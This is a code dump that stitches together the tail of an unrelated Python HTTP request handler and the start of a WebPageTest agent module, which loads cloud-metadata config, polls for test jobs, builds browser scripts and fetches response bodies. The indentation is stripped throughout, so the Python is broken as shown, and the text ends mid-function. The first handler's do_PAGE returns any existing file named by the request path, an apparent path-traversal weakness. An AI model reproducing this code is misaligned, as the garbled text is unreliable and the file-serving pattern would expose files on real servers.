if "UID" in self.cookies:
self.uid = self.cookies["UID"]
else:
self.uid = None
def do_GET(self):
'''
Called by parent to process GET requests. Forwards requests to do_PAGE.
'''
if not self.server._runmode: return
self.processCookies()
qry = urlparse(self.path)
req = dict(parse_qsl(qry.query))
self.server.log_message("GET %s %s", qry, req)
if "session" in req:
pageid = req["session"]
self.uid = HtmlPage.pageMap[pageid]
else:
self.uid = None
# self.setNewUID()
if qry.path == "/":
# result = self.server._getHome(self.uid)
c = self.getContext()
result = c.showHome()
if callable(result):
self.log_message("HOME CALL %s", result)
c.showPage(self, result, qry)
else:
self.log_message("HOME SEND %s", result)
self.reply(result)
elif qry.path == "/appscript.js":
self.reply(JSCRIPT)
else:
self.do_PAGE(qry)
def do_POST(self):
'''
Called by parent to process POST requests. Handles the built-in
/state and /run requests and forwards all others to do_PAGE.
'''
if not self.server._runmode: return
self.processCookies()
l = int(self.headers["Content-length"])
data = self.rfile.read(l)
self.log_message("HTTP POST %s", data)
if self.path == "/_process_srv0":
self.log_message("PROCESS %s", data)
req = json.loads(data)
c = self.getContext()
results = c.processCommand(req)
self.reply(results)
else:
self.do_PAGE(data)
def do_PAGE(self, qry):
'''
Process page requests except /state and /run.
'''
self.log_message("PAGE %s", qry)
if os.path.exists(qry.path[1:]):
# try to send a file with the given name if it exists.
self.replyFile(qry.path[1:])
else:
# otherwise, pass on the request to the Client object. It will
# execute a method with the same name if it exists.
c = self.getContext()
c.showPage(self, qry.path, qry)
def log_message(self, format, *args):
if self.server.verbose:
print(format % args)
|
webpagetest.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Main entry point for interfacing with WebPageTest server"""
from datetime import datetime
import gzip
import logging
import multiprocessing
import os
import platform
import re
import shutil
import socket
import subprocess
import threading
import time
import urllib
import zipfile
import psutil
import monotonic
import ujson as json
DEFAULT_JPEG_QUALITY = 30
class WebPageTest(object):
"""Controller for interfacing with the WebPageTest server"""
# pylint: disable=E0611
def __init__(self, options, workdir):
import requests
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
self.job = None
self.first_failure = None
self.session = requests.Session()
self.options = options
self.fps = options.fps
self.test_run_count = 0
self.log_formatter = logging.Formatter(fmt="%(asctime)s.%(msecs)03d - %(message)s",
datefmt="%H:%M:%S")
self.log_handler = None
# Configurable options
self.url = options.server
self.location = ''
self.test_locations = []
if options.location is not None:
self.test_locations = options.location.split(',')
self.location = str(self.test_locations[0])
self.key = options.key
self.time_limit = 120
self.cpu_scale_multiplier = None
# get the hostname or build one automatically if we are on a vmware system
# (specific MAC address range)
hostname = platform.uname()[1]
interfaces = psutil.net_if_addrs()
if interfaces is not None:
logging.debug('Interfaces:')
logging.debug(interfaces)
for interface in interfaces:
iface = interfaces[interface]
for addr in iface:
match = re.search(r'^00[\-:]50[\-:]56[\-:]00[\-:]'
r'([\da-fA-F]+)[\-:]([\da-fA-F]+)$', addr.address)
if match:
server = match.group(1)
machine = match.group(2)
hostname = 'VM{0}-{1}'.format(server, machine)
self.pc_name = hostname if options.name is None else options.name
self.auth_name = options.username
self.auth_password = options.password if options.password is not None else ''
self.validate_server_certificate = options.validcertificate
self.instance_id = None
self.zone = None
# Get the screen resolution if we're in desktop mode
self.screen_width = None
self.screen_height = None
if not self.options.android and not self.options.iOS:
if self.options.xvfb:
self.screen_width = 1920
self.screen_height = 1200
elif platform.system() == 'Windows':
try:
from win32api import GetSystemMetrics
self.screen_width = GetSystemMetrics(0)
self.screen_height = GetSystemMetrics(1)
except Exception:
pass
elif platform.system() == 'Darwin':
try:
from AppKit import NSScreen
self.screen_width = int(NSScreen.screens()[0].frame().size.width)
self.screen_height = int(NSScreen.screens()[0].frame().size.height)
except Exception:
pass
# See if we have to load dynamic config options
if self.options.ec2:
self.load_from_ec2()
elif self.options.gce:
self.load_from_gce()
# Set the session authentication options
if self.auth_name is not None:
self.session.auth = (self.auth_name, self.auth_password)
self.session.verify = self.validate_server_certificate
if options.cert is not None:
if options.certkey is not None:
self.session.cert = (options.cert, options.certkey)
else:
self.session.cert = options.cert
# Set up the temporary directories
self.workdir = os.path.join(workdir, self.pc_name)
self.persistent_dir = self.workdir + '.data'
self.profile_dir = os.path.join(self.workdir, 'browser')
if os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
# If we are running in a git clone, grab the date of the last
# commit as the version
self.version = '19.04'
try:
directory = os.path.abspath(os.path.dirname(__file__))
out = subprocess.check_output('git log -1 --format=%cd --date=raw',
shell=True, cwd=directory)
if out is not None:
matches = re.search(r'^(\d+)', out)
if matches:
timestamp = int(matches.group(1))
git_date = datetime.utcfromtimestamp(timestamp)
self.version = git_date.strftime('%y%m%d.%H%m%S')
except Exception:
pass
# Load the discovered browser margins
self.margins = {}
margins_file = os.path.join(self.persistent_dir, 'margins.json')
if os.path.isfile(margins_file):
with open(margins_file, 'rb') as f_in:
self.margins = json.load(f_in)
# Override the public webpagetest server automatically
if self.url is not None and self.url.find('www.webpagetest.org') >= 0:
self.url = 'http://agent.webpagetest.org/work/'
# pylint: enable=E0611
def benchmark_cpu(self):
"""Benchmark the CPU for mobile emulation"""
self.cpu_scale_multiplier = 1.0
if not self.options.android and not self.options.iOS:
import hashlib
logging.debug('Starting CPU benchmark')
hash_val = hashlib.sha256()
with open(__file__, 'rb') as f_in:
hash_data = f_in.read(4096)
start = monotonic.monotonic()
# 106k iterations takes ~1 second on the reference machine
for _ in xrange(106000):
hash_val.update(hash_data)
elapsed = monotonic.monotonic() - start
self.cpu_scale_multiplier = 1.0 / elapsed
logging.debug('CPU Benchmark elapsed time: %0.3f, multiplier: %0.3f',
elapsed, self.cpu_scale_multiplier)
def get_persistent_dir(self):
"""Return the path to the persistent cache directory"""
return self.persistent_dir
def load_from_ec2(self):
"""Load config settings from EC2 user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
# The Windows AMI's use static routes which are not copied across regions.
# This sets them up before we attempt to access the metadata
if platform.system() == "Windows":
from .os_util import run_elevated
directory = os.path.abspath(os.path.dirname(__file__))
ec2_script = os.path.join(directory, 'support', 'ec2', 'win_routes.ps1')
run_elevated('powershell.exe', ec2_script)
# Make sure the route blocking isn't configured on Linux
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'delete', '169.254.169.254'])
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/user-data',
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/meta-data/instance-id',
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/latest/meta-data/placement/availability-zone',
timeout=30, proxies=proxies)
if len(response.text):
self.zone = response.text.strip()
if not len(self.test_locations):
self.location = self.zone[:-1]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
# Block access to the metadata server
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'add', '169.254.169.254', 'gw', '127.0.0.1', 'lo'])
def load_from_gce(self):
"""Load config settings from GCE user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/computeMetadata/v1/instance/attributes/wpt_data',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/computeMetadata/v1/instance/id',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
if not len(self.test_locations):
ok = False
while not ok:
try:
response = session.get('http://metadata.google.internal/computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
zone = response.text.strip()
position = zone.rfind('/')
if position > -1:
zone = zone[position + 1:]
self.zone = zone
self.location = 'gce-' + self.zone[:-2]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def parse_user_data(self, user_data):
"""Parse the provided user data and extract the config info"""
logging.debug("User Data: %s", user_data)
options = user_data.split()
for option in options:
try:
parts = option.split('=', 1)
if len(parts) == 2:
key = parts[0].strip()
value = parts[1].strip()
logging.debug('Setting config option "%s" to "%s"', key, value)
if key == 'wpt_server':
if re.search(r'^https?://', value):
self.url = value
if value.endswith('/'):
self.url += 'work/'
else:
self.url += '/work/'
else:
self.url = 'http://{0}/work/'.format(value)
if key == 'wpt_url':
self.url = value
elif key == 'wpt_loc' or key == 'wpt_location':
if value is not None:
self.test_locations = value.split(',')
self.location = str(self.test_locations[0])
if key == 'wpt_location':
append = []
for loc in self.test_locations:
append.append('{0}_wptdriver'.format(loc))
if len(append):
self.test_locations.extend(append)
elif key == 'wpt_key':
self.key = value
elif key == 'wpt_timeout':
self.time_limit = int(re.search(r'\d+', str(value)).group())
elif key == 'wpt_username':
self.auth_name = value
elif key == 'wpt_password':
self.auth_password = value
elif key == 'wpt_validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'wpt_fps':
self.fps = int(re.search(r'\d+', str(value)).group())
elif key == 'fps':
self.fps = int(re.search(r'\d+', str(value)).group())
except Exception:
pass
# pylint: disable=E1101
def get_uptime_minutes(self):
"""Get the system uptime in seconds"""
boot_time = None
try:
boot_time = psutil.boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.get_boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.BOOT_TIME
except Exception:
pass
uptime = None
if boot_time is not None and boot_time > 0:
uptime = int((time.time() - boot_time) / 60)
if uptime is not None and uptime < 0:
uptime = 0
return uptime
# pylint: enable=E1101
def reboot(self):
if platform.system() == 'Windows':
subprocess.call(['shutdown', '/r', '/f'])
else:
subprocess.call(['sudo', 'reboot'])
def get_test(self, browsers):
"""Get a job from the server"""
import requests
proxies = {"http": None, "https": None}
from .os_util import get_free_disk_space
if self.cpu_scale_multiplier is None:
self.benchmark_cpu()
if self.url is None:
return None
job = None
locations = list(self.test_locations) if len(self.test_locations) > 1 else [self.location]
location = str(locations.pop(0))
# Shuffle the list order
if len(self.test_locations) > 1:
self.test_locations.append(str(self.test_locations.pop(0)))
count = 0
retry = True
while count < 3 and retry:
retry = False
count += 1
url = self.url + "getwork.php?f=json&shards=1&reboot=1"
url += "&location=" + urllib.quote_plus(location)
url += "&pc=" + urllib.quote_plus(self.pc_name)
if self.key is not None:
url += "&key=" + urllib.quote_plus(self.key)
if self.instance_id is not None:
url += "&ec2=" + urllib.quote_plus(self.instance_id)
if self.zone is not None:
url += "&ec2zone=" + urllib.quote_plus(self.zone)
if self.options.android:
url += '&apk=1'
url += '&version={0}'.format(self.version)
if self.screen_width is not None:
url += '&screenwidth={0:d}'.format(self.screen_width)
if self.screen_height is not None:
url += '&screenheight={0:d}'.format(self.screen_height)
free_disk = get_free_disk_space()
url += '&freedisk={0:0.3f}'.format(free_disk)
uptime = self.get_uptime_minutes()
if uptime is not None:
url += '&upminutes={0:d}'.format(uptime)
if 'collectversion' in self.options and \
self.options.collectversion:
versions = []
for name in browsers.keys():
if 'version' in browsers[name]:
versions.append('{0}:{1}'.format(name, \
browsers[name]['version']))
browser_versions = ','.join(versions)
url += '&browsers=' + urllib.quote_plus(browser_versions)
logging.info("Checking for work: %s", url)
try:
response = self.session.get(url, timeout=30, proxies=proxies)
if self.options.alive:
with open(self.options.alive, 'a'):
os.utime(self.options.alive, None)
self.first_failure = None
if len(response.text):
if response.text == 'Reboot':
self.reboot()
return None
job = response.json()
logging.debug("Job: %s", json.dumps(job))
# set some default options
job['agent_version'] = self.version
if 'imageQuality' not in job:
job['imageQuality'] = DEFAULT_JPEG_QUALITY
if 'pngScreenShot' not in job:
job['pngScreenShot'] = 0
if 'fvonly' not in job:
job['fvonly'] = 0
if 'width' not in job:
job['width'] = 1024
if 'height' not in job:
job['height'] = 768
if 'browser_width' in job:
job['width'] = job['browser_width']
if 'browser_height' in job:
job['height'] = job['browser_height']
if 'timeout' not in job:
job['timeout'] = self.time_limit
if 'noscript' not in job:
job['noscript'] = 0
if 'Test ID' not in job or 'browser' not in job or 'runs' not in job:
job = None
if 'type' not in job:
job['type'] = ''
if job['type'] == 'traceroute':
job['fvonly'] = 1
if 'fps' not in job:
job['fps'] = self.fps
if 'warmup' not in job:
job['warmup'] = 0
if job['type'] == 'lighthouse':
job['fvonly'] = 1
job['lighthouse'] = 1
job['keep_lighthouse_trace'] = \
bool('lighthouseTrace' in job and job['lighthouseTrace'])
job['lighthouse_throttle'] = \
bool('lighthouseThrottle' in job and job['lighthouseThrottle'])
job['video'] = bool('Capture Video' in job and job['Capture Video'])
job['keepvideo'] = bool('keepvideo' in job and job['keepvideo'])
job['disable_video'] = bool(not job['video'] and
'disable_video' in job and
job['disable_video'])
job['interface'] = None
job['persistent_dir'] = self.persistent_dir
if 'throttle_cpu' in job:
throttle = float(re.search(r'\d+\.?\d*', str(job['throttle_cpu'])).group())
if 'bypass_cpu_normalization' not in job or not job['bypass_cpu_normalization']:
throttle *= self.cpu_scale_multiplier
job['throttle_cpu_requested'] = job['throttle_cpu']
job['throttle_cpu'] = throttle
if job is None and len(locations) > 0:
location = str(locations.pop(0))
retry = True
except requests.exceptions.RequestException as err:
logging.critical("Get Work Error: %s", err.strerror)
retry = True
now = monotonic.monotonic()
if self.first_failure is None:
self.first_failure = now
# Reboot if we haven't been able to reach the server for 30 minutes
elapsed = now - self.first_failure
if elapsed > 1800:
self.reboot()
time.sleep(0.1)
except Exception:
pass
self.job = job
return job
def get_task(self, job):
"""Create a task object for the next test run or return None if the job is done"""
task = None
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'current_state' not in job or not job['current_state']['done']:
if 'run' in job:
# Sharded test, running one run only
if 'current_state' not in job:
job['current_state'] = {"run": int(re.search(r'\d+', str(job['run'])).group()),
"repeat_view": False,
"done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
return task
elif 'current_state' not in job:
job['current_state'] = {"run": 1, "repeat_view": False, "done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
if job['warmup'] > 0:
job['warmup'] -= 1
else:
job['current_state']['run'] += 1
job['current_state']['repeat_view'] = False
if job['current_state']['run'] <= job['runs']:
test_id = job['Test ID']
run = job['current_state']['run']
profile_dir = '{0}.{1}.{2:d}'.format(self.profile_dir, test_id, run)
task = {'id': test_id,
'run': run,
'cached': 1 if job['current_state']['repeat_view'] else 0,
'done': False,
'profile': profile_dir,
'error': None,
'log_data': True,
'activity_time': 2,
'combine_steps': False,
'video_directories': [],
'page_data': {},
'navigated': False,
'page_result': None,
'script_step_count': 1}
# Set up the task configuration options
task['port'] = 9222 + (self.test_run_count % 500)
task['task_prefix'] = "{0:d}".format(run)
if task['cached']:
task['task_prefix'] += "_Cached"
task['prefix'] = task['task_prefix']
short_id = "{0}.{1}.{2}".format(task['id'], run, task['cached'])
task['dir'] = os.path.join(self.workdir, short_id)
task['task_video_prefix'] = 'video_{0:d}'.format(run)
if task['cached']:
task['task_video_prefix'] += "_cached"
task['video_subdirectory'] = task['task_video_prefix']
if os.path.isdir(task['dir']):
shutil.rmtree(task['dir'])
os.makedirs(task['dir'])
if not os.path.isdir(profile_dir):
os.makedirs(profile_dir)
if job['current_state']['run'] == job['runs'] or 'run' in job:
if job['current_state']['repeat_view']:
job['current_state']['done'] = True
task['done'] = True
elif 'fvonly' in job and job['fvonly']:
job['current_state']['done'] = True
task['done'] = True
if 'debug' in job and job['debug']:
task['debug_log'] = os.path.join(task['dir'], task['prefix'] + '_debug.log')
try:
self.log_handler = logging.FileHandler(task['debug_log'])
self.log_handler.setFormatter(self.log_formatter)
logging.getLogger().addHandler(self.log_handler)
except Exception:
pass
if 'keepua' not in job or not job['keepua']:
task['AppendUA'] = 'PTST'
if 'UAModifier' in job:
task['AppendUA'] = job['UAModifier']
task['AppendUA'] += '/{0}'.format(self.version)
if 'AppendUA' in job:
if 'AppendUA' in task:
task['AppendUA'] += ' ' + job['AppendUA']
else:
task['AppendUA'] = job['AppendUA']
if 'AppendUA' in task:
task['AppendUA'] = task['AppendUA'].replace('%TESTID%', test_id)\
.replace('%RUN%', str(run))\
.replace('%CACHED%', str(task['cached']))\
.replace('%VERSION%', self.version)
task['block'] = []
if 'block' in job:
block_list = job['block'].split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
if 'blockDomains' in job:
if 'host_rules' not in task:
task['host_rules'] = []
if 'block_domains' not in task:
task['block_domains'] = []
domains = re.split('[, ]', job['blockDomains'])
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
self.build_script(job, task)
task['width'] = job['width']
task['height'] = job['height']
if 'mobile' in job and job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
task['width'] = \
job['width'] + max(self.margins[job['browser']]['width'], 0)
task['height'] = \
job['height'] + max(self.margins[job['browser']]['height'], 0)
else:
task['width'] = job['width'] + 20
task['height'] = job['height'] + 120
task['time_limit'] = job['timeout']
task['test_time_limit'] = task['time_limit'] * task['script_step_count']
task['stop_at_onload'] = bool('web10' in job and job['web10'])
task['run_start_time'] = monotonic.monotonic()
# Keep the full resolution video frames if the browser window is smaller than 600px
if 'thumbsize' not in job and (task['width'] < 600 or task['height'] < 600):
job['fullSizeVideo'] = 1
self.test_run_count += 1
if task is None and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
return task
def running_another_test(self, task):
"""Increment the port for Chrome and the run count"""
task['port'] = 9222 + (self.test_run_count % 500)
self.test_run_count += 1
def build_script(self, job, task):
"""Build the actual script that will be used for testing"""
task['script'] = []
record_count = 0
# Add script commands for any static options that need them
if 'script' in job:
lines = job['script'].splitlines()
for line in lines:
parts = line.split("\t", 2)
if parts is not None and len(parts):
keep = True
record = False
command = parts[0].lower().strip()
target = parts[1].strip() if len(parts) > 1 else None
value = parts[2].strip() if len(parts) > 2 else None
andwait = command.find('andwait')
if andwait > -1:
command = command[:andwait]
record = True
# go through the known commands
if command == 'navigate':
if target is not None and target[:4] != 'http':
target = 'http://' + target
job['url'] = target
record = True
elif command == 'addheader' or command == 'setheader':
if target is not None and len(target):
separator = target.find(':')
if separator > 0:
name = target[:separator].strip()
header_value = target[separator + 1:].strip()
if 'headers' not in task:
task['headers'] = {}
task['headers'][name] = header_value
elif command == 'overridehost':
if target and value:
if 'overrideHosts' not in task:
task['overrideHosts'] = {}
task['overrideHosts'][target] = value
elif command == 'setcookie' and target is not None and value is not None:
url = target
cookie = value
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
cookie_name = cookie[:pos].strip()
cookie_value = cookie[pos + 1:].strip()
if len(cookie_name) and len(cookie_value) and len(url):
if 'cookies' not in task:
task['cookies'] = []
task['cookies'].append({'url': url,
'name': cookie_name,
'value': cookie_value})
# commands that get pre-processed
elif command == 'setuseragent' and target is not None:
job['uastring'] = target
elif command == 'setbrowsersize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
dpr = float(job['dpr']) if 'dpr' in job else 1.0
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = int(float(width) / dpr)
job['height'] = int(float(height) / dpr)
elif command == 'setviewportsize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = width
job['height'] = height
# Adjust the viewport for non-mobile tests
if 'mobile' not in job or not job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
job['width'] += \
max(self.margins[job['browser']]['width'], 0)
job['height'] += \
max(self.margins[job['browser']]['height'], 0)
else:
job['adjust_viewport'] = True
elif command == 'setdevicescalefactor' and target is not None:
keep = False
job['dpr'] = target
elif command == 'settimeout':
keep = False
if target is not None:
time_limit = int(re.search(r'\d+', str(target)).group())
if time_limit > 0 and time_limit < 1200:
job['timeout'] = time_limit
elif command == 'blockdomains':
keep = False
if target is not None:
if 'block_domains' not in task:
task['block_domains'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = re.split('[, ]', target)
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
elif command == 'blockdomainsexcept':
keep = False
if target is not None:
if 'block_domains_except' not in task:
task['block_domains_except'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = target.split()
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains_except'].append(domain)
task['host_rules'].append(
'"MAP * 127.0.0.1, EXCLUDE {0}"'.format(domain))
elif command == 'block':
keep = False
if target is not None:
block_list = target.split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
elif command == 'setdns':
keep = False
if target is not None and value is not None and len(target) and len(value):
if target.find('"') == -1 and value.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, value))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', value) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, value])
elif command == 'setdnsname':
# Resolve the IP and treat it like a setdns command
keep = False
if target is not None and value is not None and len(target) and len(value):
addr = None
try:
result = socket.getaddrinfo(value, 80)
if result and len(result) > 0:
for entry in result:
if entry and len(entry) >= 5:
sockaddr = entry[4]
if sockaddr and len(sockaddr) >= 1:
addr = sockaddr[0]
break
except Exception:
pass
if addr is not None and target.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, addr))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', addr) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, addr])
# Commands that get translated into exec commands
elif command in ['click', 'selectvalue', 'sendclick', 'setinnerhtml',
'setinnertext', 'setvalue', 'submitform']:
if target is not None:
# convert the selector into a querySelector
separator = target.find('=')
if separator == -1:
separator = target.find("'")
if separator >= 0:
attribute = target[:separator]
attr_value = target[separator + 1:]
script = "document.querySelector('[{0}=\"{1}\"]')".format(
attribute, attr_value)
if command in ['click', 'sendclick']:
script += '.click();'
elif command == 'submitform' and attr_value is not None:
script += '.submit();'
record = True
elif command in ['setvalue', 'selectvalue'] and value is not None:
script += '.value="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnertext' and value is not None:
script += '.innerText="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnerhtml' and value is not None:
script += '.innerHTML="{0}";'.format(value.replace('"', '\\"'))
command = 'exec'
target = script
value = None
if keep:
if record:
record_count += 1
task['script'].append({'command': command,
'target': target,
'value': value,
'record': record})
elif 'url' in job:
if job['url'][:4] != 'http':
job['url'] = 'http://' + job['url']
record_count += 1
task['script'].append({'command': 'navigate', 'target': job['url'], 'record': True})
# Remove any spurious commands from the end of the script
pos = len(task['script']) - 1
while pos > 0:
if task['script'][pos]['record']:
break
task['script'].pop(pos)
pos -= 1
task['script_step_count'] = max(record_count, 1)
logging.debug(task['script'])
def update_browser_viewport(self, task):
"""Update the browser border size based on the measured viewport"""
if 'actual_viewport' in task and 'width' in task and 'height' in task and \
self.job is not None and 'browser' in self.job:
browser = self.job['browser']
width = max(task['width'] - task['actual_viewport']['width'], 0)
height = max(task['height'] - task['actual_viewport']['height'], 0)
if browser not in self.margins or self.margins[browser]['width'] != width or \
self.margins[browser]['height'] != height:
self.margins[browser] = {"width": width, "height": height}
if not os.path.isdir(self.persistent_dir):
os.makedirs(self.persistent_dir)
margins_file = os.path.join(self.persistent_dir, 'margins.json')
with open(margins_file, 'wb') as f_out:
json.dump(self.margins, f_out)
def body_fetch_thread(self):
"""background thread to fetch bodies"""
import requests
session = requests.session()
proxies = {"http": None, "https": None}
try:
while True:
task = self.fetch_queue.get_nowait()
try:
url = task['url']
dest = task['file']
headers = {}
if isinstance(task['headers'], list):
for header in task['headers']:
separator = header.find(':', 2)
if separator >= 0:
header_name = header[:separator].strip()
value = header[separator + 1:].strip()
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
elif isinstance(task['headers'], dict):
for header_name in task['headers']:
value = task['headers'][header_name]
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
logging.debug('Downloading %s to %s', url, dest)
response = session.get(url, headers=headers, stream=True,
timeout=30, proxies=proxies)
if response.status_code == 200:
with open(dest, 'wb') as f_out:
for chunk in response.iter_content(chunk_size=4096):
f_out.write(chunk)
self.fetch_result_queue.put(task)
except Exception:
pass
self.fetch_queue.task_done()
except Exception:
pass
def get_bodies(self, task):
"""Fetch any bodies that are missing if response bodies were requested"""
all_bodies = False
html_body = False
if 'bodies' in self.job and self.job['bodies']:
all_bodies = True
if 'htmlbody' in self.job and self.job['htmlbody']:
html_body = True
if not all_bodies and not html_body:
return
try:
path_base = os.path.join(task['dir'], task['prefix'])
path = os.path.join(task['dir'], 'bodies')
requests = []
devtools_file = os.path.join(task['dir'], task['prefix'] + '_devtools_requests.json.gz')
with gzip.open(devtools_file, 'rb') as f_in:
requests = json.load(f_in)
count = 0
bodies_zip = path_base + '_bodies.zip'
if requests and 'requests' in requests:
# See what bodies are already in the zip file
body_index = 0
bodies = []
try:
with zipfile.ZipFile(bodies_zip, 'r') as zip_file:
files = zip_file.namelist()
for filename in files:
matches = re.match(r'^(\d\d\d)-(.*)-body.txt$', filename)
if matches:
index = int(matches.group(1))
request_id = str(matches.group(2))
if index > body_index:
body_index = index
bodies.append(request_id)
except Exception:
pass
for request in requests['requests']:
if 'full_url' in request and \
'responseCode' in request \
and request['responseCode'] == 200 and \
request['full_url'].find('ocsp') == -1 and\
request['full_url'].find('.woff') == -1 and\
request['full_url'].find('.ttf') == -1 and\
'contentType' in request:
content_type = request['contentType'].lower()
need_body = False
if all_bodies:
if content_type.startswith('text/html') or \
content_type.find('javascript') >= 0 or \
content_type.find('json') >= 0:
need_body = True
elif html_body and content_type.startswith('text/html'):
need_body = True
html_body = False
if need_body:
body_id = str(request['id'])
if 'raw_id' in request:
body_id = str(request['raw_id'])
if body_id not in bodies:
count += 1
body_file_path = os.path.join(path, str(body_id))
headers = None
if 'headers' in request and 'request' in request['headers']:
headers = request['headers']['request']
task = {'url': request['full_url'],
'file': body_file_path,
'id': body_id,
'headers': headers}
if os.path.isfile(body_file_path):
self.fetch_result_queue.put(task)
else:
self.fetch_queue.put(task)
if count:
if not os.path.isdir(path):
os.makedirs(path)
logging.debug("Fetching bodies for %d requests", count)
threads = []
thread_count = min(count, 10)
for _ in xrange(thread_count):
thread = threading.Thread(target=self.body_fetch_thread)
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join(timeout=120)
# Build a list of files to add to the zip archive
bodies = []
try:
while True:
task = self.fetch_result_queue.get_nowait()
if os.path.isfile(task['file']):
# check to see if it is text or utf-8 data
try:
data = ''
with open(task['file'], 'rb') as f_in:
data = f_in.read()
json.loads('"' + data.replace('"', '\\"') + '"')
body_index += 1
file_name = '{0:03d}-{1}-body.txt'.format(body_index, task['id'])
bodies.append({'name': file_name, 'file': task['file']})
except Exception:
pass
self.fetch_result_queue.task_done()
except Exception:
pass
# Add the files
if bodies:
with zipfile.ZipFile(bodies_zip, 'a', zipfile.ZIP_DEFLATED) as zip_file:
for body in bodies:
zip_file.write(body['file'], body['name'])
except Exception:
pass
def upload_task_result(self, task):
"""Upload the result of an individual test run"""
logging.info('Uploading result')
cpu_pct = None
self.update_browser_viewport(task)
# Stop logging to the file
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'debug_log' in task and os.path.isfile(task['debug_log']):
debug_out = task['debug_log'] + '.gz'
with open(task['debug_log'], 'rb') as f_in:
with gzip.open(debug_out, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(task['debug_log'])
except Exception:
pass
if self.job['warmup'] > 0:
logging.debug('Discarding warmup run')
else:
if 'page_data' in task and 'fullyLoadedCPUpct' in task['page_data']:
cpu_pct = task['page_data']['fullyLoadedCPUpct']
data = {'id': task['id'],
'location': self.location,
'run': str(task['run']),
'cached': str(task['cached']),
'pc': self.pc_name}
if self.key is not None:
data['key'] = self.key
if self.instance_id is not None:
data['ec2'] = self.instance_id
if self.zone is not None:
data['ec2zone'] = self.zone
needs_zip = []
zip_path = None
if os.path.isdir(task['dir']):
# upload any video images
if bool(self.job['video']) and len(task['video_directories']):
for video_subdirectory in task['video_directories']:
video_dir = os.path.join(task['dir'], video_subdirectory)
if os.path.isdir(video_dir):
for filename in os.listdir(video_dir):
